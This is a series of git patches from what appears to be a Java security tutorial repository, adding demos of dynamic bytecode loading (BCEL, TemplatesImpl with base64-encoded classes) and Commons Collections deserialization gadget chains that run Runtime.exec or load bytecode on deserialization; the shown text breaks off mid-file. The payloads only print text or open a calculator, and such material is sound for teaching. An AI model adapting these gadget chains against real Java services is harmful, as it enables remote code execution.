From 158019f15e03043b4c0e79b5c76e8f5ead87a557 Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 27 Oct 2020 23:33:16 +0800 Subject: [PATCH 01/35] =?UTF-8?q?=E7=95=AA=E5=A4=96=E7=AF=871?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 1 + general/src/main/java/com/govuln/HelloTemplatesImpl.java | 6 +----- 2 files changed, 2 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index c7ded84..0af1ec0 100644 --- a/README.md +++ b/README.md @@ -16,6 +16,7 @@ - [Java安全漫谈 - 10.用TransformedMap编写真正的POC](https://t.zsxq.com/ZNZrJMZ) - [Java安全漫谈 - 11.LazyMap详解](https://t.zsxq.com/FufUf2B) - [Java安全漫谈 - 12.简化版CommonsCollections6](https://t.zsxq.com/A2j2beE) +- [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://mp.weixin.qq.com/s/TBSlxuxhdvHZrJVPObiRYQ) ## Demo代码 diff --git a/general/src/main/java/com/govuln/HelloTemplatesImpl.java b/general/src/main/java/com/govuln/HelloTemplatesImpl.java index a104309..3176cbe 100644 --- a/general/src/main/java/com/govuln/HelloTemplatesImpl.java +++ b/general/src/main/java/com/govuln/HelloTemplatesImpl.java @@ -16,12 +16,8 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); - - // source: bytecodes/Foo.java - byte[] foo = Base64.getDecoder().decode("yv66vgAAADQADQoAAwAKBwALBwAMAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAClNvdXJjZUZpbGUBAAhGb28uamF2YQwABAAFAQADRm9vAQAQamF2YS9sYW5nL09iamVjdAAhAAIAAwAAAAAAAQABAAQABQABAAYAAAAdAAEAAQAAAAUqtwABsQAAAAEABwAAAAYAAQAAAAEAAQAIAAAAAgAJ"); - TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][] {code, foo}); + setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); From 4d77687b78233f0c729b5e831db85ea56aa6c869 Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 27 Oct 2020 23:38:33 +0800 Subject: [PATCH 02/35] replace url --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0af1ec0..360ecc2 100644 --- a/README.md +++ b/README.md @@ -16,7 +16,7 @@ - [Java安全漫谈 - 10.用TransformedMap编写真正的POC](https://t.zsxq.com/ZNZrJMZ) - [Java安全漫谈 - 11.LazyMap详解](https://t.zsxq.com/FufUf2B) - [Java安全漫谈 - 12.简化版CommonsCollections6](https://t.zsxq.com/A2j2beE) -- [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://mp.weixin.qq.com/s/TBSlxuxhdvHZrJVPObiRYQ) +- [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html) ## Demo代码 From a22aa8bd9772a945ef65142d2724b9e95a1b5356 Mon Sep 17 00:00:00 2001 From: phith0n Date: Mon, 2 Nov 2020 04:24:46 +0800 Subject: [PATCH 03/35] bcel --- .../src/main/java/com/govuln/HelloBCEL.java | 23 +++++++++++++++++++ general/src/main/java/evil/Hello.java | 7 ++++++ 2 files changed, 30 insertions(+) create mode 100644 general/src/main/java/com/govuln/HelloBCEL.java create mode 100644 general/src/main/java/evil/Hello.java diff --git a/general/src/main/java/com/govuln/HelloBCEL.java b/general/src/main/java/com/govuln/HelloBCEL.java new file mode 100644 index 0000000..7332376 --- /dev/null +++ b/general/src/main/java/com/govuln/HelloBCEL.java @@ -0,0 +1,23 @@ +package com.govuln; + +import com.sun.org.apache.bcel.internal.classfile.JavaClass; +import com.sun.org.apache.bcel.internal.classfile.Utility; +import com.sun.org.apache.bcel.internal.Repository; +import com.sun.org.apache.bcel.internal.util.ClassLoader; + +public class HelloBCEL { + public static void main(String []args) throws Exception { + // encode(); + decode(); + } + + protected static void encode() throws Exception { + JavaClass cls = Repository.lookupClass(evil.Hello.class); + String code = Utility.encode(cls.getBytes(), true); + System.out.println(code); + } + + protected static void decode() throws Exception { + new ClassLoader().loadClass("$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmP$cbN$CA$Q$ac$91$c7$$$cb$w$I$e2$fby0$B$P$ee$c5$h$c4$8b$89$f1$b0Q$T$M$9e$87e$82C$86$j$b3$M$q$7e$96$k4$f1$e0$H$f8Q$c6$9e$91$f8H$ecCW$ba$aa$ba$d23$ef$l$afo$AN$b0$X$a0$88$e5$Sj$a8$fbX$J$d0$c0$aa$875$P$eb$M$c5$8eL$a59e$c85$5b$3d$86$fc$99$k$I$86J$ySq9$j$f7Ev$c3$fb$8a$98Z$ac$T$aez$3c$93v$9e$93ys$t$t$Ma$yfRE$XB$v$ddf$f0$3b$89$9a$87$G$5d$3d$cd$Sq$$$ad$3bp$86$e3$R$9f$f1$Q$k$7c$P$h$n6$b1$c5Pv$ca$fe$ad$ce$d4$c0$c3v$88$j$ec$92$ff$t$95$a1j$d7$o$c5$d3at$d5$l$89$c4$fc$a1$ba$P$T$p$c6$f4$I$3d$r$a1$R$3bE$ea$e8$3a$93$a9$e9$9aL$f01$jV$ff$87f$f0$ee$ed$a4R$dak$c6$bf$o$N$d1$c3v$ab$87$D$U$e8$fbl$z$80$d9$c3$a9$97h$8a$I$Za$e1$e8$F$ec$d1$c9$B$f5$a2$ps$uS$P$bf$M$84$8b$84$3e$96$be$97$P$c9m$ab$f4$84$85Z$ee$Zy$h$c0$5c$40$e0$a4$CYmT$c5$FW$3f$B$dc$ab$c0$7f$cc$B$A$A").newInstance(); + } +} diff --git a/general/src/main/java/evil/Hello.java b/general/src/main/java/evil/Hello.java new file mode 100644 index 0000000..ad3f297 --- /dev/null +++ b/general/src/main/java/evil/Hello.java @@ -0,0 +1,7 @@ +package evil; + +public class Hello { + static { + System.out.println("Hello World"); + } +} From 992249b6de2e772b144f468fd9f7fc05536a8b7e Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 3 Nov 2020 00:06:48 +0800 Subject: [PATCH 04/35] add a new section --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 360ecc2..9b3d0b3 100644 --- a/README.md +++ b/README.md @@ -17,6 +17,7 @@ - [Java安全漫谈 - 11.LazyMap详解](https://t.zsxq.com/FufUf2B) - [Java安全漫谈 - 12.简化版CommonsCollections6](https://t.zsxq.com/A2j2beE) - [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html) +- [Java安全漫谈 - 13.Java中动态加载字节码的那些方法](https://t.zsxq.com/E2VfUVB) ## Demo代码 @@ -24,3 +25,4 @@ - 远程字节码加载Demo:[HelloClassLoader](general/src/main/java/com/govuln/HelloClassLoader.java) - 系统默认defineClass加载字节码Demo:[HelloDefineClass](general/src/main/java/com/govuln/HelloDefineClass.java) - 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](general/src/main/java/com/govuln/HelloTemplatesImpl.java) +- 使用BCEL加载字节码Demo:[HelloBCEL](general/src/main/java/com/govuln/HelloBCEL.java) From e8ce81e636af29ce849f1bdc6c175eb30731acd6 Mon Sep 17 00:00:00 2001 From: phith0n Date: Tue, 22 Dec 2020 04:40:20 +0800 Subject: [PATCH 05/35] update --- deserialization/.gitignore | 3 - deserialization/deserialization.iml | 2 - deserialization/pom.xml | 75 ------------------- general/general.iml | 2 - general/pom.xml | 7 +- .../com/govuln/{ => bytes}/HelloBCEL.java | 2 +- .../govuln/{ => bytes}/HelloClassLoader.java | 2 +- .../govuln/{ => bytes}/HelloDefineClass.java | 2 +- .../{ => bytes}/HelloTemplatesImpl.java | 2 +- .../CommonCollectionsIntro.java | 25 +++++++ .../deserialization/CommonsCollections3.java | 72 ++++++++++++++++++ .../deserialization}/CommonsCollections6.java | 2 +- .../CommonsCollectionsIntro2.java | 42 +++++++++++ .../CommonsCollectionsIntro3.java | 46 ++++++++++++ .../TemplatesImplDeserialization.java | 71 ++++++++++++++++++ 15 files changed, 267 insertions(+), 88 deletions(-) delete mode 100644 deserialization/.gitignore delete mode 100644 deserialization/deserialization.iml delete mode 100644 deserialization/pom.xml delete mode 100644 general/general.iml rename general/src/main/java/com/govuln/{ => bytes}/HelloBCEL.java (98%) rename general/src/main/java/com/govuln/{ => bytes}/HelloClassLoader.java (93%) rename general/src/main/java/com/govuln/{ => bytes}/HelloDefineClass.java (97%) rename general/src/main/java/com/govuln/{ => bytes}/HelloTemplatesImpl.java (98%) create mode 100644 general/src/main/java/com/govuln/deserialization/CommonCollectionsIntro.java create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections3.java rename {deserialization/src/main/java/com/govuln => general/src/main/java/com/govuln/deserialization}/CommonsCollections6.java (98%) create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java create mode 100644 general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java diff --git a/deserialization/.gitignore b/deserialization/.gitignore deleted file mode 100644 index 406ec20..0000000 --- a/deserialization/.gitignore +++ /dev/null @@ -1,3 +0,0 @@ -*.class -target/ -.idea/ \ No newline at end of file diff --git a/deserialization/deserialization.iml b/deserialization/deserialization.iml deleted file mode 100644 index 78b2cc5..0000000 --- a/deserialization/deserialization.iml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/deserialization/pom.xml b/deserialization/pom.xml deleted file mode 100644 index 4fb8ed9..0000000 --- a/deserialization/pom.xml +++ /dev/null @@ -1,75 +0,0 @@ - - - - 4.0.0 - - com.govuln - deserialization - 1.0-SNAPSHOT - - deserialization - - http://www.example.com - - - UTF-8 - 1.7 - 1.7 - - - - - - commons-collections - commons-collections - 3.2.1 - - - - - - - - - maven-clean-plugin - 3.1.0 - - - - maven-resources-plugin - 3.0.2 - - - maven-compiler-plugin - 3.8.0 - - - maven-surefire-plugin - 2.22.1 - - - maven-jar-plugin - 3.0.2 - - - maven-install-plugin - 2.5.2 - - - maven-deploy-plugin - 2.8.2 - - - - maven-site-plugin - 3.7.1 - - - maven-project-info-reports-plugin - 3.0.0 - - - - - diff --git a/general/general.iml b/general/general.iml deleted file mode 100644 index 78b2cc5..0000000 --- a/general/general.iml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/general/pom.xml b/general/pom.xml index f99f4ec..8c46c88 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -19,7 +19,12 @@ - + + + commons-collections + commons-collections + 3.2.1 + diff --git a/general/src/main/java/com/govuln/HelloBCEL.java b/general/src/main/java/com/govuln/bytes/HelloBCEL.java similarity index 98% rename from general/src/main/java/com/govuln/HelloBCEL.java rename to general/src/main/java/com/govuln/bytes/HelloBCEL.java index 7332376..f0e92af 100644 --- a/general/src/main/java/com/govuln/HelloBCEL.java +++ b/general/src/main/java/com/govuln/bytes/HelloBCEL.java @@ -1,4 +1,4 @@ -package com.govuln; +package com.govuln.bytes; import com.sun.org.apache.bcel.internal.classfile.JavaClass; import com.sun.org.apache.bcel.internal.classfile.Utility; diff --git a/general/src/main/java/com/govuln/HelloClassLoader.java b/general/src/main/java/com/govuln/bytes/HelloClassLoader.java similarity index 93% rename from general/src/main/java/com/govuln/HelloClassLoader.java rename to general/src/main/java/com/govuln/bytes/HelloClassLoader.java index 72c4b41..60020e6 100644 --- a/general/src/main/java/com/govuln/HelloClassLoader.java +++ b/general/src/main/java/com/govuln/bytes/HelloClassLoader.java @@ -1,4 +1,4 @@ -package com.govuln; +package com.govuln.bytes; import java.net.URL; import java.net.URLClassLoader; diff --git a/general/src/main/java/com/govuln/HelloDefineClass.java b/general/src/main/java/com/govuln/bytes/HelloDefineClass.java similarity index 97% rename from general/src/main/java/com/govuln/HelloDefineClass.java rename to general/src/main/java/com/govuln/bytes/HelloDefineClass.java index 7caf606..9ae4bb9 100644 --- a/general/src/main/java/com/govuln/HelloDefineClass.java +++ b/general/src/main/java/com/govuln/bytes/HelloDefineClass.java @@ -1,4 +1,4 @@ -package com.govuln; +package com.govuln.bytes; import java.lang.reflect.Method; import java.util.Base64; diff --git a/general/src/main/java/com/govuln/HelloTemplatesImpl.java b/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java similarity index 98% rename from general/src/main/java/com/govuln/HelloTemplatesImpl.java rename to general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java index 3176cbe..598788e 100644 --- a/general/src/main/java/com/govuln/HelloTemplatesImpl.java +++ b/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java @@ -1,4 +1,4 @@ -package com.govuln; +package com.govuln.bytes; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; diff --git a/general/src/main/java/com/govuln/deserialization/CommonCollectionsIntro.java b/general/src/main/java/com/govuln/deserialization/CommonCollectionsIntro.java new file mode 100644 index 0000000..51a0db5 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonCollectionsIntro.java @@ -0,0 +1,25 @@ +package com.govuln.deserialization; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.map.TransformedMap; + +import java.util.HashMap; +import java.util.Map; + +public class CommonCollectionsIntro { + public static void main(String[] args) throws Exception { + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(Runtime.getRuntime()), + new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"}), + }; + + Transformer transformerChain = new ChainedTransformer(transformers); + + Map innerMap = new HashMap(); + Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); + outerMap.put("test", "xxxx"); + } +} \ No newline at end of file diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java new file mode 100644 index 0000000..b3f1918 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java @@ -0,0 +1,72 @@ +package com.govuln.deserialization; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InstantiateTransformer; +import org.apache.commons.collections.map.TransformedMap; + +import javax.xml.transform.Templates; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.annotation.Retention; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.util.Base64; +import java.util.HashMap; +import java.util.Map; + +public class CommonsCollections3 { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public static void main(String[] args) throws Exception { + // source: bytecodes/HelloTemplateImpl.java + byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][]{code}); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(TrAXFilter.class), + new InstantiateTransformer( + new Class[] { Templates.class }, + new Object[] { obj }) + }; + + Transformer transformerChain = new ChainedTransformer(fakeTransformers); + + Map innerMap = new HashMap(); + innerMap.put("value", "xxxx"); + Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); + + Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); + Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class); + construct.setAccessible(true); + InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap); + + setFieldValue(transformerChain, "iTransformers", transformers); + // ================== + // 生成序列化字符串 + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(handler); + oos.close(); + + // 本地测试触发 + // System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object) ois.readObject(); + } +} diff --git a/deserialization/src/main/java/com/govuln/CommonsCollections6.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections6.java similarity index 98% rename from deserialization/src/main/java/com/govuln/CommonsCollections6.java rename to general/src/main/java/com/govuln/deserialization/CommonsCollections6.java index bdd3d7f..c0e2a1f 100644 --- a/deserialization/src/main/java/com/govuln/CommonsCollections6.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections6.java @@ -1,4 +1,4 @@ -package com.govuln; +package com.govuln.deserialization; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java new file mode 100644 index 0000000..d50a6ed --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java @@ -0,0 +1,42 @@ +package com.govuln.deserialization; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.map.TransformedMap; +import org.apache.commons.collections.Transformer; + +import java.lang.reflect.Field; +import java.util.Base64; +import java.util.HashMap; +import java.util.Map; + +public class CommonsCollectionsIntro2 { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public static void main(String[] args) throws Exception { + // source: bytecodes/HelloTemplateImpl.java + byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][] {code}); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(obj), + new InvokerTransformer("newTransformer", null, null) + }; + + Transformer transformerChain = new ChainedTransformer(transformers); + + Map innerMap = new HashMap(); + Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); + outerMap.put("test", "xxxx"); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java new file mode 100644 index 0000000..0694a86 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java @@ -0,0 +1,46 @@ +package com.govuln.deserialization; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InstantiateTransformer; +import org.apache.commons.collections.map.TransformedMap; +import org.apache.commons.collections.Transformer; + +import javax.xml.transform.Templates; +import java.lang.reflect.Field; +import java.util.Base64; +import java.util.HashMap; +import java.util.Map; + +public class CommonsCollectionsIntro3 { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public static void main(String[] args) throws Exception { + // source: bytecodes/HelloTemplateImpl.java + byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][] {code}); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(TrAXFilter.class), + new InstantiateTransformer( + new Class[] { Templates.class }, + new Object[] { obj }) + }; + + Transformer transformerChain = new 